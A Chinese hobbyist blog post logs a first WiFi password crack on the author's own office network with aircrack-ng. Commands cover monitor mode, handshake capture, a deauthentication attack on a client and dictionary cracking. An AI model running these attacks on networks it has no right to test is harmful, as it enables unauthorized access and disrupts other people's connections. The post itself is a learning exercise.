WiFi破解

记录第一次成功破解WiFi密码

网上买的无线网卡到了，赶紧插上电脑开始使用，看了好几篇大佬的博客，总算是把已经知道的办公室的WiFi密码给破解出来了
忙碌了一个多小时，看来没白忙活

安装软件

Aircrack-ng是一个包含一个多款工具的套装

1	`sudo pacman -S aircrack-ng`

准备一个外置的无线网卡

准备

先看看有没有连上无线网卡

lsusb

可以看到我的网卡是连接上了的

查看网卡是否启用

1	`ifconfig`

网卡已启用，而且没有连上任何网络

查看网卡状态

1	`iwconfig`

网卡的模式处于Managed

启动网卡至 Monitor 模式

1 2	`sudo airmon-ng start wlp3s0f3u4 #启动网卡为 Monitor 模式 sudo airmon-ng stop wlp3s0f3u4 #恢复网卡为正常模式`

然后就能看到网卡处于 Monitor 模式了
可以看到网卡名字后面多了mon

搜集信息

1	`sudo airodump-ng wlp3s0f3u4mon`

可以看到许多WiFi信息
记录下需要破解的 WiFi 信息，按两下 q 退出

抓包

使用 airodump-ng 抓握手包

sudo airodump-ng --ivs --bssid 24:CF:24:58:FF:DA -w test -c 1 wlp3s0f3u4mon

--ivs     #只抓取可用于破解的IVS数据报文
--bssid   #路由器的 Mac 地址
-w        #写入到文件中
-c        #CH，频道

保存的文件并不是叫 test ，而是叫 test-01.ivs

可以看到有一个设备接入了这个路由器，就是我的手机
保存好需要的信息，这个终端不要关闭，这是留着抓握手包的

攻击

开一个新的终端

sudo aireplay-ng -0 1 -a 24:CF:24:58:FF:DA -c 26:12:15:11:89:54 wlp3s0f3u4mon
-0   #采用 deauth 攻击模式，后面跟上攻击次数
-a   #路由器的mac地址
-c   #客户端的mac地址

输入后，客户端的WiFi就会断开，然后重新连接路由器

然后在抓包的那个终端，就可能抓到握手包
成功抓到握手包

密码爆破

1	`aircrack-ng -w key.txt test-01.ivs`

为了能快速成功爆破，我把真正的 WiFi 密码放入了字典中
破解密码成功
中间 KEY FOUND! 的后面中括号里的就是 WiFi 密码

去年就看到身边的大佬给我展示 WiFi 破解，当时就很震撼，这不比那些假的 WiFi 破解强多了？然后就忘了这个事了
几天前看别的大佬博客的时候，又看到了这个方法破解 WiFi 密码，我就想自己尝试一次
两天前买的无线网卡，今天就到了，快递的速度还是很快的，于是就赶紧开始了实验
实验结果很满意，因为成功了嘛 (o^∇^o)ﾉ

姿势学习

#WiFi

Java笔记上一篇

Java笔记下一篇